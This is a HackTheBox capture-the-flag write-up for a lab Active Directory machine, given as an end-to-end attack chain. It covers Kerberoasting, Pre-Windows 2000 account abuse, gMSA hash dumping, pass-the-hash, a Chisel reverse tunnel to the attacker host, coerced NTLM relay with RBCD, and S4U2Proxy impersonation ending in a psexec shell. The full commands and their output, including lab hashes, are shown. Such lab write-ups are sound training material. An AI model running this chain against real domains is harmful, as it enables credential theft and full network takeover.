HackTheBox - Pirate

Updated 29-03-2026
#htb #hackthebox #ctf #writeup #windows #crackmapexec #evil-winrm #privilege-escalation #active-directory #domain-controller #kerberos #pass-the-hash #chisel #proxychains #impacket #netexec #smb #ldap #kerberoasting #pre2k #pre-windows-2000 #gmsa #gmsa-dump #ntlm-relay #rbcd #resource-based-constrained-delegation #coercion #s4u2proxy #spn-manipulation #bloodhound #lateral-movement #windows-server-2019 #hyper-v #internal-network

A Windows Active Directory machine that chains Pre-Windows 2000 misconfigurations, gMSA credential abuse, NTLM relay with RBCD, and SPN manipulation to pivot from a low-privileged domain account all the way to Domain Admin.

Recon

Nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
$ ip=10.129.14.90; ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//); nmap -p$ports -sC -sV $ip
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-02 10:37 -0500
Nmap scan report for 10.129.14.90
Host is up (0.24s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-03-02 22:37:12Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: pirate.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-03-02T22:38:52+00:00; +6h59m43s from scanner time.
| ssl-cert: Subject: commonName=DC01.pirate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.pirate.htb
| Not valid before: 2025-06-09T14:05:15
|_Not valid after:  2026-06-09T14:05:15
443/tcp   open  https?
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: pirate.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-03-02T22:38:53+00:00; +6h59m43s from scanner time.
| ssl-cert: Subject: commonName=DC01.pirate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.pirate.htb
| Not valid before: 2025-06-09T14:05:15
|_Not valid after:  2026-06-09T14:05:15
2179/tcp  open  vmrdp?
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: pirate.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-03-02T22:38:52+00:00; +6h59m43s from scanner time.
| ssl-cert: Subject: commonName=DC01.pirate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.pirate.htb
| Not valid before: 2025-06-09T14:05:15
|_Not valid after:  2026-06-09T14:05:15
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: pirate.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-03-02T22:38:52+00:00; +6h59m43s from scanner time.
| ssl-cert: Subject: commonName=DC01.pirate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.pirate.htb
| Not valid before: 2025-06-09T14:05:15
|_Not valid after:  2026-06-09T14:05:15
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49677/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49678/tcp open  msrpc         Microsoft Windows RPC
49680/tcp open  msrpc         Microsoft Windows RPC
49681/tcp open  msrpc         Microsoft Windows RPC
49905/tcp open  msrpc         Microsoft Windows RPC
63684/tcp open  msrpc         Microsoft Windows RPC
63709/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2026-03-02T22:38:12
|_  start_date: N/A
|_clock-skew: mean: 6h59m42s, deviation: 0s, median: 6h59m42s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 112.66 seconds

The full port profile confirms this is a Domain Controller for pirate.htb (DC01.pirate.htb). Notable findings:

  • 2179/tcp — VM Remote Desktop Protocol, suggesting Hyper-V is running and there may be a guest VM on an internal network
  • 5985/tcp — WinRM available for remote management
  • 7-hour clock skew — Kerberos operations will require clock synchronization
  • SMB signing is required on DC01, ruling out NTLM relay directly against it

Foothold

Hosts File

1
$ echo '10.129.14.90 pirate.htb dc01.pirate.htb' | sudo tee -a /etc/hosts

SMB Enumeration

We start with credentials for pentest:p3nt3st2025!&. Enumerate accessible shares:

1
2
3
4
5
6
7
8
9
10
11
$ crackmapexec smb pirate.htb --shares -u pentest -p 'p3nt3st2025!&'  
SMB         pirate.htb      445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:pirate.htb) (signing:True) (SMBv1:False)
SMB         pirate.htb      445    DC01             [+] pirate.htb\pentest:p3nt3st2025!& 
SMB         pirate.htb      445    DC01             [+] Enumerated shares
SMB         pirate.htb      445    DC01             Share           Permissions     Remark
SMB         pirate.htb      445    DC01             -----           -----------     ------
SMB         pirate.htb      445    DC01             ADMIN$                          Remote Admin
SMB         pirate.htb      445    DC01             C$                              Default share
SMB         pirate.htb      445    DC01             IPC$            READ            Remote IPC
SMB         pirate.htb      445    DC01             NETLOGON        READ            Logon server share 
SMB         pirate.htb      445    DC01             SYSVOL          READ            Logon server share

Only standard shares are accessible — nothing immediately useful.

User Enumeration

Dump domain users via samrdump:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
$ impacket-samrdump pirate.htb/pentest:p3nt3st2025\!\&@pirate.htb
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Retrieving endpoint list from pirate.htb
Found domain(s):
 . PIRATE
 . Builtin
[*] Looking up users in domain PIRATE
Found user: Administrator, uid = 500
Found user: Guest, uid = 501
Found user: krbtgt, uid = 502
Found user: a.white_adm, uid = 1104
Found user: a.white, uid = 3101
Found user: pentest, uid = 4106
Found user: j.sparrow, uid = 4110
<-SNIP->

LDAP Enumeration

Query LDAP for user group memberships and Pre-Windows 2000 group members:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
$ ldapsearch -x -H ldap://10.129.14.90:389 \
  -D 'pentest@pirate.htb' -w 'p3nt3st2025!&' \
  -b "DC=pirate,DC=htb" "(&(objectClass=user)(!(objectClass=computer)))" \
  sAMAccountName memberOf -LLL

dn: CN=Angela W. ADM,CN=Users,DC=pirate,DC=htb
memberOf: CN=IT,CN=Users,DC=pirate,DC=htb
sAMAccountName: a.white_adm

<--SNIP-->

dn: CN=Pre-Windows 2000 Compatible Access,CN=Builtin,DC=pirate,DC=htb
cn: Pre-Windows 2000 Compatible Access
member: CN=EXCH01,CN=Computers,DC=pirate,DC=htb
member: CN=MS01,CN=Computers,DC=pirate,DC=htb
member: CN=DC01,OU=Domain Controllers,DC=pirate,DC=htb
member: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=pirate,DC=htb

a.white_adm is a member of the IT group. EXCH01 and MS01 are listed under the Pre-Windows 2000 Compatible Access group — a strong signal they may have default weak passwords.

Query SPNs to identify Kerberoastable accounts:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
$ ldapsearch -x -H ldap://10.129.14.90:389 \
  -D 'pentest@pirate.htb' -w 'p3nt3st2025!&' \
  -b "DC=pirate,DC=htb" "(&(objectClass=user)(servicePrincipalName=*))" \
  sAMAccountName servicePrincipalName -LLL

<--SNIP-->

dn: CN=Angela W. ADM,CN=Users,DC=pirate,DC=htb
sAMAccountName: a.white_adm
servicePrincipalName: ADFS/a.white

dn: CN=WEB01,CN=Computers,DC=pirate,DC=htb
sAMAccountName: WEB01$
servicePrincipalName: tapinego/WEB01
servicePrincipalName: tapinego/WEB01.pirate.htb
servicePrincipalName: WSMAN/WEB01
servicePrincipalName: WSMAN/WEB01.pirate.htb
servicePrincipalName: HOST/WEB01.pirate.htb
servicePrincipalName: RestrictedKrbHost/WEB01.pirate.htb
servicePrincipalName: HOST/WEB01
servicePrincipalName: RestrictedKrbHost/WEB01
servicePrincipalName: TERMSRV/WEB01.pirate.htb
servicePrincipalName: TERMSRV/WEB01
servicePrincipalName: HTTP/WEB01
servicePrincipalName: HTTP/WEB01.pirate.htb

dn: CN=gMSA_ADFS_prod,CN=Managed Service Accounts,DC=pirate,DC=htb
sAMAccountName: gMSA_ADFS_prod$
servicePrincipalName: host/adfs.pirate.htb

Key findings from the SPN query:

  • a.white_adm has ADFS/a.white — a user account with a SPN, making it a Kerberoast candidate
  • WEB01$ has HTTP/WEB01 and WSMAN/WEB01 — a computer account reachable over HTTP and WinRM
  • gMSA_ADFS_prod$ has host/adfs.pirate.htb — a Group Managed Service Account

Kerberoasting

Request the TGS hash for a.white_adm. The first attempt fails due to the clock skew flagged during Nmap:

1
2
3
4
$ impacket-GetUserSPNs pirate.htb/pentest:'p3nt3st2025!&' -dc-ip 10.129.14.90 -request

<--SNIP-->
[-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

Sync the clock and retry:

1
$ sudo ntpdate -u 10.129.14.90
1
2
3
4
5
6
7
8
9
10
11
$ impacket-GetUserSPNs pirate.htb/pentest:'p3nt3st2025!&' -dc-ip 10.129.14.90 -request
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

ServicePrincipalName  Name         MemberOf                         PasswordLastSet             LastLogon                   Delegation  
--------------------  -----------  -------------------------------  --------------------------  --------------------------  -----------
ADFS/a.white          a.white_adm  CN=IT,CN=Users,DC=pirate,DC=htb  2026-01-15 19:36:34.388000  2025-06-09 12:03:37.380258  constrained 



[-] CCache file is not found. Skipping...
$krb5tgs$23$*a.white_adm$PIRATE.HTB$pirate.htb/a.white_adm*$956abd635f1feadf6c38d49b373733d8$269f4ae331e46587195c6adaf58de8f0a061f719e619d9d05b8a34ad9126eae94f688312c102a9adbdbbbae3bde4f24e38c9903a20bd1254ba4b1bcb0e39760d138f983ad870569c7cef4b94ffca833a2e18c81cfae8e224273c362a629fdf14d2844eb6aee01511af50d791d853297c745cb1cd7b6bd8066b51cb1cb2b98a57237d198fe07ebb6854a6143f802ccd7e5224c0aee7173c67aa37ecf43cb05fc1dfdb76bf480ed4293e780ce63e5c100fbdb572cdcdb6456b932ee57ccfb091f2806da9997ecb563a0916bfd5ebe3610f82c1c61793ea596e0080912c2fc40f39db421a269467e08757f97b46845b8a4e5814cd808079587135198059e6d2f4c92ee4d84e38e3d3a7424665bad6e109cee2f07eac93cd9fd8cf2160128c1c00d00ee1f718580cc8003c66e72bff45eb246d87291d41a4fe6f642c9ee16d2ece897e491ec13e6990ab653f85d2542a53bb03af146731d9e67bf86c089e3e6a1a5a65b1189b80c1a862e8a29a385d03cf9901d84d5f7b8c4baed4b543e9fc72e340d10cede238f621bbb98c1bb454e5c41fb91fd18a269a0b4e5fcef7188862e4443194b074e6ecc416e2fb23cc4b08bf786bea3e5316cae06f1ed0b90f29cd14f22425f6cad5f0ac1d4a0a77f1c950aa1d897cb2735e635ef9da85eac35f3b4444bed703b482ed33170ea87a12afba45f64b9010136dce6ae90cdc2ed4ad488ea9a29a6d9bf023abd93334f01072abd7d64843529ed909812164dafebb4ea429e69d5800189c5653f065e838715c729b645c64fc78cc6b6ee0038fbf37cd5293f15cac60d37a5bb4dab21bc156aa8177cbf3964e7e795075fe09f07e0204d9122c1fe9e20bdbf047251b3e27f1fbed7395bb018f82ca2c3644bab20a3d0f8dbb1dc2f2dfa3ace8e5dd8308a931816b02d6e0a8614a396fc53ce20a2517f1dd530a1eb864766426dd3e4b3b2f2a3901a2e8498f950a22fe2507536dd55edd69287cb5f31fbc45e3115eb5cbf6256c98426103dbb0f213c238b69ae179caa3911433c19f7d7f6cfca074b4b969347946201c4dbb85471acce3d549091a361e0164689b9428d26fbb997ef9013dbbc22d56ade8f46f80cdf3e4911790c5434c2d7a7cb0e294b9c8767beafd705d2959dc14de45a7e551df849a70f339501b2ced10b6d43adab75e9effdb0f10c8062492526743db5c5679b1c72893ae3fac4531433ebdafd1497c395d7a372f095bc9b8cd9b3c5adeb69e38c254471dbed668d2f5bb569f99197846de806b426eb63653eee39787aee115f6eddcc41f92d6e35884bedb1a86c5b28b715582b4e5cbc18b3c4e7e5cc5d603e8742e0dcef9dd092721a516158e053c388b968563e98073f8bbadaf8d6013abe62a72918dc916cc9b7d97684ddb6bb47c0d186be1d77e7d5886fe2b48d5359228d76f1a7eea7e5d723ef92d5661cd822b56e77b43

Cracking the hash with Hashcat fails, so we pivot to a different attack path.

Pre-Windows 2000 Computer Account Abuse

Computer accounts added to the Pre-Windows 2000 Compatible Access group are often created with a predictable default password matching their lowercase hostname. Use pre2k to test this:

1
2
3
$ git clone https://github.com/garrettfoster13/pre2k.git
$ cd pre2k
$ pipx install .
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
$ pre2k auth -u pentest -p p3nt3st2025\!\& -dc-ip dc01.pirate.htb -d pirate.htb

                                ___    __         
                              /'___`\ /\ \        
 _____   _ __    __          /\_\ /\ \\ \ \/'\    
/\ '__`\/\`'__\/'__`\ _______\/_/// /__\ \ , <  
\ \ \L\ \ \ \//\  __//\______\  // /_\ \\ \ \\`\  
 \ \ ,__/\ \_\\ \____\/______/ /\______/ \ \_\ \_\
  \ \ \/  \/_/ \/____/         \/_____/   \/_/\/_/
   \ \_\                                      v3.1    
    \/_/                                          
                                            @unsigned_sh0rt
                                            @Tw1sm          

[19:09:57] INFO     Retrieved 6 results total.                               
[19:09:57] INFO     Testing started at 2026-03-02 19:09:57                   
[19:09:57] INFO     Using 10 threads                                         
[19:09:58] INFO     VALID CREDENTIALS: pirate.htb\EXCH01$:exch01             
[19:09:58] INFO     VALID CREDENTIALS: pirate.htb\MS01$:ms01

Confirm using NetExec’s pre2k module, which also retrieves TGTs for the affected accounts:

1
2
3
4
5
6
7
8
9
$ nxc ldap pirate.htb -u pentest -p p3nt3st2025\!\& -M pre2k
LDAP        10.129.14.90    389    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:pirate.htb) (signing:None) (channel binding:Never)                               
LDAP        10.129.14.90    389    DC01             [+] pirate.htb\pentest:p3nt3st2025!&          
PRE2K       10.129.14.90    389    DC01             Pre-created computer account: MS01$          
PRE2K       10.129.14.90    389    DC01             Pre-created computer account: EXCH01$        
PRE2K       10.129.14.90    389    DC01             [+] Found 2 pre-created computer accounts. Saved to /home/kali/.nxc/modules/pre2k/pirate.htb/precreated_computers.txt
PRE2K       10.129.14.90    389    DC01             [+] Successfully obtained TGT for ms01@pirate.htb
PRE2K       10.129.14.90    389    DC01             [+] Successfully obtained TGT for exch01@pirate.htb
PRE2K       10.129.14.90    389    DC01             [+] Successfully obtained TGT for 2 pre-created computer accounts. Saved to /home/kali/.nxc/modules/pre2k/ccache

Resetting the MS01$ Password

Attempting to authenticate directly with MS01$:ms01 fails:

1
2
3
$ nxc smb pirate.htb -u MS01$ -p ms01                       
SMB         10.129.14.90    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:pirate.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.14.90    445    DC01             [-] pirate.htb\MS01$:ms01 STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT

STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT means the computer account exists but its trust relationship with the domain is broken — typically because the password is out of sync. We can reset it using impacket-changepasswd, authenticating as MS01$ itself with the known default password:

1
2
3
4
5
6
7
$ impacket-changepasswd pirate.htb/MS01\$@pirate.htb -newpass '123' -p rpc-samr   
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

Current password: 
[*] Changing the password of pirate.htb\MS01$
[*] Connecting to DCE/RPC as pirate.htb\MS01$
[*] Password was changed successfully.

Verify the new credentials work:

1
2
3
$ nxc smb pirate.htb -u MS01$ -p 123           
SMB         10.129.14.90    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:pirate.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.14.90    445    DC01             [+] pirate.htb\MS01$:123

Dumping the gMSA Password

MS01$ is a domain computer account. Use gMSADumper to check whether it can read any gMSA password blobs — computer accounts in the right groups are often granted read access to gMSA passwords:

1
2
3
4
5
6
7
8
9
10
11
$ python3 gMSADumper.py -u MS01\$ -p 123 -d pirate.htb -l dc01.pirate.htb
Users or groups who can read password for gMSA_ADCS_prod$:
 > Domain Secure Servers
gMSA_ADCS_prod$:::25c7f0eb586ed3a91375dbf2f6e4a3ea
gMSA_ADCS_prod$:aes256-cts-hmac-sha1-96:9914ba076bcac3bb56424c0b7d8ea8b45eb088d87fdbee3d1c6a386709e20771
gMSA_ADCS_prod$:aes128-cts-hmac-sha1-96:8e87fa0a6d2d81ff7bc5da963838e714
Users or groups who can read password for gMSA_ADFS_prod$:
 > Domain Secure Servers
gMSA_ADFS_prod$:::fd9ea7ac7820dba5155bd6ed2d850c09
gMSA_ADFS_prod$:aes256-cts-hmac-sha1-96:6ccf53f00842805c75c7b314bdee5df355849093b3ef64a443c011f81f962f06
gMSA_ADFS_prod$:aes128-cts-hmac-sha1-96:fffb52ec0f49bc1eb872cfa4fa4f93ad

MS01$ can read the password for gMSA_ADFS_prod$. Verify the hash works:

1
2
3
$ nxc smb pirate.htb -u gMSA_ADFS_prod$ -H fd9ea7ac7820dba5155bd6ed2d850c09
SMB         10.129.1.9      445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:pirate.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.1.9      445    DC01             [+] pirate.htb\gMSA_ADFS_prod$:fd9ea7ac7820dba5155bd6ed2d850c09

WinRM Access as gMSA_ADFS_prod$

Log in via WinRM and enumerate the host:

1
$ evil-winrm -i pirate.htb -u gMSA_ADFS_prod$ -H fd9ea7ac7820dba5155bd6ed2d850c09

ipconfig reveals a virtual Hyper-V network adapter — consistent with the 2179/tcp port seen during the Nmap scan — indicating an internal VM on 192.168.100.0/24:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
*Evil-WinRM* PS C:\Users\gMSA_ADFS_prod$\Documents> ipconfig

Windows IP Configuration


Ethernet adapter vEthernet (Switch01):

   Connection-specific DNS Suffix  . :
   Link-local IPv6 Address . . . . . : fe80::d976:c606:587e:f1e1%8
   IPv4 Address. . . . . . . . . . . : 192.168.100.1
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . :

Ethernet adapter Ethernet0 2:

   Connection-specific DNS Suffix  . : .htb
   IPv4 Address. . . . . . . . . . . : 10.129.1.9
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : 10.129.0.1

Internal Network Discovery

Sweep the internal 192.168.100.0/24 subnet for live hosts:

1
2
3
*Evil-WinRM* PS C:\Users\gMSA_ADFS_prod$\Documents>     1..255 | % { $ip="192.168.100.$_"; if (Test-NetConnection $ip -InformationLevel Quiet -WarningAction SilentlyContinue -ErrorAction SilentlyContinue) {$ip} }
192.168.100.1
192.168.100.2

192.168.100.2 is a live VM. Set up a Chisel SOCKS5 tunnel to reach it from the attack machine.

Tunnelling with Chisel

Start the Chisel server on the attack machine:

1
$ chisel server -p 8080 --reverse

Upload chisel.exe to the target and connect back:

1
2
3
4
5
6
7
8
9
10
*Evil-WinRM* PS C:\Users\gMSA_ADFS_prod$\Documents> upload chisel.exe
                                        
Info: Uploading /home/kali/tools/chisel.exe to C:\Users\gMSA_ADFS_prod$\Documents\chisel.exe
                                        
Data: 14149632 bytes of 14149632 bytes copied
*Evil-WinRM* PS C:\Users\gMSA_ADFS_prod$\Documents> .\chisel client 10.10.16.27:8080 R:socks
chisel.exe : 2026/03/06 09:49:13 client: Connecting to ws://10.10.16.27:8080
    + CategoryInfo          : NotSpecified: (2026/03/06 09:4...0.10.16.27:8080:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
2026/03/06 09:49:15 client: Connected (Latency 113.2576ms)

Port Scanning the VM

Scan common ports on 192.168.100.2 through the SOCKS5 tunnel:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
$ sudo proxychains4 -q -f /etc/proxychains4-1.conf nmap -p21,22,53,80,88,135,139,389,443,445,3389,5985 -sT -Pn 192.168.100.2
[sudo] password for kali: 
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-06 05:50 -0500
Nmap scan report for 192.168.100.2
Host is up (0.00s latency).

PORT     STATE  SERVICE
21/tcp   closed ftp
22/tcp   closed ssh
53/tcp   closed domain
80/tcp   open   http
88/tcp   closed kerberos-sec
135/tcp  open   msrpc
139/tcp  open   netbios-ssn
389/tcp  closed ldap
443/tcp  open   https
445/tcp  open   microsoft-ds
3389/tcp closed ms-wbt-server
5985/tcp open   wsman

Nmap done: 1 IP address (1 host up) scanned in 97.08 seconds

WinRM is open on the VM. The gMSA_ADFS_prod$ hash works here too:

1
2
3
4
5
6
7
8
9
10
$ sudo proxychains4 -q -f /etc/proxychains4-1.conf evil-winrm -i 192.168.100.2 -u gMSA_ADFS_prod$ -H fd9ea7ac7820dba5155bd6ed2d850c09
                                        
Evil-WinRM shell v3.9
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\gMSA_ADFS_prod$.PIRATE\Documents>

The VM is WEB01:

1
2
3
4
*Evil-WinRM* PS C:\Users\gMSA_ADFS_prod$.PIRATE\Documents> whoami
pirate\gmsa_adfs_prod$
*Evil-WinRM* PS C:\Users\gMSA_ADFS_prod$.PIRATE\Documents> hostname
WEB01

The user a.white has a home directory on WEB01, but we can’t access it yet:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
*Evil-WinRM* PS C:\Users> ls


    Directory: C:\Users


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        1/15/2026   7:37 PM                a.white
d-----         6/9/2025  10:11 AM                Administrator
d-----         6/9/2025   6:55 AM                Administrator.PIRATE
d-----         6/9/2025   7:31 AM                gMSA_ADFS_prod$
d-----        1/15/2026   6:40 PM                gMSA_ADFS_prod$.PIRATE
d-r---         6/8/2025   1:29 PM                Public

NTLM Relay with RBCD against WEB01

An nxc scan confirms that WEB01 has SMB signing disabled — making it a valid NTLM relay target:

1
2
3
$ proxychains4 -q -f /etc/proxychains4-1.conf nxc smb 192.168.100.2 -u gMSA_ADFS_prod$ -H fd9ea7ac7820dba5155bd6ed2d850c09
SMB         192.168.100.2   445    WEB01            [*] Windows 10 / Server 2019 Build 17763 x64 (name:WEB01) (domain:pirate.htb) (signing:False) (SMBv1:None)
SMB         192.168.100.2   445    WEB01            [+] pirate.htb\gMSA_ADFS_prod$:fd9ea7ac7820dba5155bd6ed2d850c09

Start ntlmrelayx targeting LDAPS on the DC with --delegate-access. This will automatically create a new machine account and configure Resource-Based Constrained Delegation (RBCD) on WEB01$, granting the new account the right to impersonate any user on WEB01:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
$ impacket-ntlmrelayx -t ldaps://pirate.htb --delegate-access --remove-mic -smb2support
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Protocol Client DCSYNC loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client WINRMS loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client MSSQL loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server on port 445
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server on port 9389
[*] Setting up RAW Server on port 6666
[*] Setting up WinRM (HTTP) Server on port 5985
[*] Setting up WinRMS (HTTPS) Server on port 5986
[*] Setting up RPC Server on port 135
[*] Multirelay disabled

[*] Servers started, waiting for connections

In a second terminal, use coercer to force WEB01 to authenticate to our machine via MS-RPRN (PrinterBug) or similar RPC methods, triggering the relay:

1
2
3
4
5
6
7
8
9
$ sudo proxychains4 -q -f /etc/proxychains4-1.conf coercer coerce -l 10.10.16.27 -t 192.168.100.2 -d pirate.htb -u 'gMSA_ADFS_prod$' --hashes :fd9ea7ac7820dba5155bd6ed2d850c09 --always-continue

<--SNIP-->

[+] SMB named pipe '\PIPE\spoolss' is accessible!
   [+] Successful bind to interface (12345678-1234-abcd-ef00-0123456789ab, 1.0)!
      [!] (NO_AUTH_RECEIVED) MS-RPRN──>RpcRemoteFindFirstPrinterChangeNotification(pszLocalMachine='\\10.10.16.27\x00') 
      [>] (-testing-) MS-RPRN──>RpcRemoteFindFirstPrinterChangeNotificationEx(pszLocalMachine='\\10.10.16.27\x00')      [!] (NO_AUTH_RECEIVED) MS-RPRN──>RpcRemoteFindFirstPrinterChangeNotificationEx(pszLocalMachine='\\10.10.16.27\x00') 
[+] All done! Bye Bye!

ntlmrelayx receives the relayed authentication and creates a new machine account ISDEFLNY$ with RBCD configured on WEB01$:

1
2
3
4
5
6
7
8
9
10
<--SNIP-->

[*] (SMB): Connection from 10.129.1.9 controlled, but there are no more targets left!
[*] ldaps://PIRATE/WEB01$@pirate.htb [1] -> Attempting to create computer in: CN=Computers,DC=pirate,DC=htb
[*] ldaps://PIRATE/WEB01$@pirate.htb [1] -> Adding new computer with username: ISDEFLNY$ and password: M^oQ*tW,e,TuV}$ result: OK
[*] ldaps://PIRATE/WEB01$@pirate.htb [1] -> Delegation rights modified succesfully!
[*] ldaps://PIRATE/WEB01$@pirate.htb [1] -> ISDEFLNY$ can now impersonate users on WEB01$ via S4U2Proxy
[*] All targets processed!

<--SNIP-->

Obtaining a Service Ticket for WEB01

Use getST with S4U2Proxy to impersonate Administrator on WEB01. The first attempt fails on clock skew, and the second on an unknown SPN — SPNs are registered under hostnames, not IPs:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
$ impacket-getST -spn 'cifs/192.168.100.2' -impersonate 'Administrator' 'pirate.htb/ISDEFLNY$:M^oQ*tW,e,TuV}$' -dc-ip pirate.htb 
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
                                                                                                                  
$ sudo ntpdate -u pirate.htb  
[sudo] password for kali: 
2026-03-06 13:29:18.515434 (-0500) +25173.789906 +/- 0.054373 pirate.htb 10.129.1.9 s1 no-leap
CLOCK: time stepped by 25173.789906
                                                                                                                  
$ impacket-getST -spn 'cifs/192.168.100.2' -impersonate 'Administrator' 'pirate.htb/ISDEFLNY$:M^oQ*tW,e,TuV}$' -dc-ip pirate.htb
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[-] Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Probably user ISDEFLNY$ does not have constrained delegation permisions or impersonated user does not exist

Add WEB01‘s hostname to /etc/hosts and retry with the FQDN:

1
$ echo '192.168.100.2 web01.pirate.htb' | sudo tee -a /etc/hosts
1
2
3
4
5
6
7
8
9
$ impacket-getST -spn 'cifs/web01.pirate.htb' -impersonate 'Administrator' 'pirate.htb/ISDEFLNY$:M^oQ*tW,e,TuV}$' -dc-ip pirate.htb
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_web01.pirate.htb@PIRATE.HTB.ccache

Export the ticket and connect to WEB01 as SYSTEM:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
$ export KRB5CCNAME=Administrator@cifs_web01.pirate.htb@PIRATE.HTB.ccache

$ sudo proxychains4 -q -f /etc/proxychains4-1.conf impacket-psexec -k -no-pass Administrator@WEB01.pirate.htb
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Requesting shares on WEB01.pirate.htb.....
[*] Found writable share ADMIN$
[*] Uploading file GTiTMaAQ.exe
[*] Opening SVCManager on WEB01.pirate.htb.....
[*] Creating service KAww on WEB01.pirate.htb.....
[*] Starting service KAww.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.8385]
(c) 2018 Microsoft Corporation. All rights reserved.

